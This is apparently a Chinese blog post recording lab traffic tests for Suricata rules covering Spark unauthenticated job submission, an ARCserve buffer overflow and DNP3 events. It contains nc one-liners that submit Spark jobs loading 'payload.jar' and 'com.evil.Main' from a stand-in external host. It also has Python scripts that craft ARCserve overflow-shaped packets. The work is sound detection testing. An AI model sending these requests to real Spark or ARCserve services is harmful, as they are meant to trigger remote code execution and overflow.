编写spark未授权漏洞、ARCserve缓冲区溢出漏洞、DNP3协议擦除缓存的suricata规则-测试(9004135-9004152)
1.测试规则(9004135-9004146)
1.主机B开启6066服务监听 nc -l -k -p 6066 >/dev/null 2.主机B抓取测试流量 tshark -i eno2 -f "tcp port 6066 and host 10.10.10.1" -w spark_submit.pcap 3.主机A发送请求至6066 DST=10.10.10.2; PORT=6066 printf 'POST /v1/submissions/create HTTP/1.1\r\nHost: %s\r\nContent-Type: application/json\r\nContent-Length: 120\r\n\r\n{"action":"CreateSubmissionRequest","appResource":"file:/tmp/a.jar","mainClass":"com.test.Main"}' "$DST" | nc -n -w 2 "$DST" "$PORT" >/dev/null printf 'POST /submissions/create HTTP/1.1\r\nHost: %s\r\nContent-Type: application/json\r\nContent-Length: 180\r\n\r\n{"action":"CreateSubmissionRequest","appResource":"http://203.0.113.9/payload.jar","mainClass":"com.evil.Main"}' "$DST" | nc -n -w 2 "$DST" "$PORT" >/dev/null printf 'POST /v1/submissions/create HTTP/1.1\r\nHost: %s\r\nContent-Type: application/json\r\nContent-Length: 185\r\n\r\n{"action":"CreateSubmissionRequest","appResource":"https://203.0.113.9/payload.jar","mainClass":"com.evil.Main"}' "$DST" | nc -n -w 2 "$DST" "$PORT" >/dev/null printf 'POST /v1/submissions/create HTTP/1.1\r\nHost: %s\r\nContent-Type: application/json\r\nContent-Length: 175\r\n\r\n{"action":"CreateSubmissionRequest","appResource":"http://203.0.113.9/p.py","mainClass":"org.apache.spark.deploy.PythonRunner"}' "$DST" | nc -n -w 2 "$DST" "$PORT" >/dev/null printf 'POST /v1/submissions/create HTTP/1.1\r\nHost: %s\r\nContent-Type: application/json\r\nContent-Length: 200\r\n\r\n{"action":"CreateSubmissionRequest","appResource":"file:/tmp/ok.jar","mainClass":"com.ok.Main","spark.jars":"http://203.0.113.9/x.jar"}' "$DST" | nc -n -w 2 "$DST" "$PORT" >/dev/null printf 'POST /v1/submissions/create HTTP/1.1\r\nHost: %s\r\nContent-Type: application/json\r\nContent-Length: 205\r\n\r\n{"action":"CreateSubmissionRequest","appResource":"file:/tmp/ok.jar","mainClass":"com.ok.Main","spark.files":"http://203.0.113.9/a.conf"}' "$DST" | nc -n -w 2 "$DST" "$PORT" >/dev/null for i in 1 2 3; do printf 'POST /v1/submissions/create HTTP/1.1\r\nHost: %s\r\nContent-Type: application/json\r\nContent-Length: 95\r\n\r\n{"action":"CreateSubmissionRequest","appResource":"file:/tmp/a.jar","mainClass":"c.M"}' "$DST" | nc -n -w 2 "$DST" "$PORT" >/dev/null done 4.主机B分析测试流量 tshark -r spark_submit.pcap -q -z conv,tcp tshark -r spark_submit.pcap -Y 'tcp.len>0' -T fields -e frame.number -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e tcp.stream tshark -r spark_submit.pcap -o tcp.desegment_tcp_streams:TRUE -q -z follow,tcp,ascii,0
2.测试规则(9004147-9004152)
1.主机B开启监听6050服务 nc -l -k -p 6050 >/dev/null 2.主机A发送请求至6050 import socket import struct from typing import Optional DST_IP = "10.10.10.2" DST_PORT = 6050 def build_payload(total_len: int, marker_offset: Optional[int], arg_len_at6: int) -> bytes: """ 目标:命中你给的规则集合(基于“payload 绝对偏移”的写法) - payload[0:2] 16-bit LE: 33..8191 (用 total_len 填) - payload[6:8] 16-bit LE: arg_len_at6 - marker_offset 处放 E8 03 (可选) - 同时保证 marker 后至少 430 bytes """ if not (33 < total_len < 8192): raise ValueError( "total_len must be in (33, 8192) to satisfy sid 9004147 byte_test") b = bytearray(b"\x00" * total_len) # offset 0: length-like field for sid 9004147 b[0:2] = struct.pack("<H", total_len) # offset 6: suspicious length field for exploit rules b[6:8] = struct.pack("<H", arg_len_at6) # optional shape marker if marker_offset is not None: need_min = marker_offset + 2 + 430 # for isdataat:430,relative if total_len < need_min: raise ValueError( f"total_len too small for marker@{marker_offset}: need >= {need_min}") b[marker_offset:marker_offset+2] = b"\xE8\x03" # 0x03E8 # 填一点非零,避免全0太“假” for i in range(16, min(total_len, 128)): b[i] = (i * 7) & 0xFF return bytes(b) def send_case(name: str, payload: bytes): print(f"[+] Sending {name}: len={len(payload)}") with socket.create_connection((DST_IP, DST_PORT), timeout=3) as s: s.sendall(payload) def main(): # 1) 仅打 ctx.arcserve.ua(>=64,长度字段合法),无 shape marker p1 = build_payload(total_len=200, marker_offset=None, arg_len_at6=100) # 2) 命中 shape256,但不满足 exploit(offset6 不大于 679) p2 = build_payload(total_len=1000, marker_offset=256, arg_len_at6=200) # 3) 触发 sid 9004150:shape256 + offset6=680 (0x02A8) p3 = build_payload(total_len=1000, marker_offset=256, arg_len_at6=680) # 4) 触发 sid 9004151:shape256 + offset6=2000,且 payload 足够大(>=1024) # 若你环境里 9004151 因 relative 锚点问题不触发,先别纠结,见下方“踩坑”建议。 p4 = build_payload(total_len=1500, marker_offset=256, arg_len_at6=2000) # 5) 触发 sid 9004152:shape384 + offset6=680 p5 = build_payload(total_len=1100, marker_offset=384, arg_len_at6=680) send_case("case1_ctx_only", p1) send_case("case2_shape256_only", p2) send_case("case3_exploit_9004150", p3) send_case("case4_exploit_9004151", p4) send_case("case5_exploit_9004152", p5) if __name__ == "__main__": main() 3.主机B分析测试流量 tshark -r arcserve_6050.pcap -q -z conv,tcp tshark -r arcserve_6050.pcap -Y 'tcp.port==6050' -T fields -e frame.number -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e tcp.stream -e tcp.len tshark -r arcserve_6050.pcap -o tcp.desegment_tcp_streams:TRUE -q -z follow,tcp,ascii,0
3.测试规则(9004153-9004165)
1.主机B开启监听 nc -lkp 20000 >/dev/null 2.主机A发送请求 import socket DST_IP = "10.10.10.2" DST_PORT = 20000 def send_event(event_id: int): # 0..27 填充,使 offset 28 对齐 padding = b"\x00" * 28 # offset 28.. : 01 41 # offset 30 : event_id payload = padding + b"\x01\x41" + bytes([event_id]) + b"\x00\x00\x00" + b"\xAA" * 32 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((DST_IP, DST_PORT)) s.sendall(payload) s.close() if __name__ == "__main__": for eid in (10, 11, 12, 26, 27, 29, 31, 32, 33, 39, 45, 47): send_event(eid)
4.测试规则(9004166)
1.主机B开启监听 nc -lkp 20000 >/dev/null 2.主机A发送请求 import socket DST_IP = "10.10.10.2" DST_PORT = 20000 SIZE = 9000 data = b"A" * SIZE with socket.create_connection((DST_IP, DST_PORT), timeout=3) as s: s.sendall(data)
5.测试规则(9004167)
浙公网安备 33010602011771号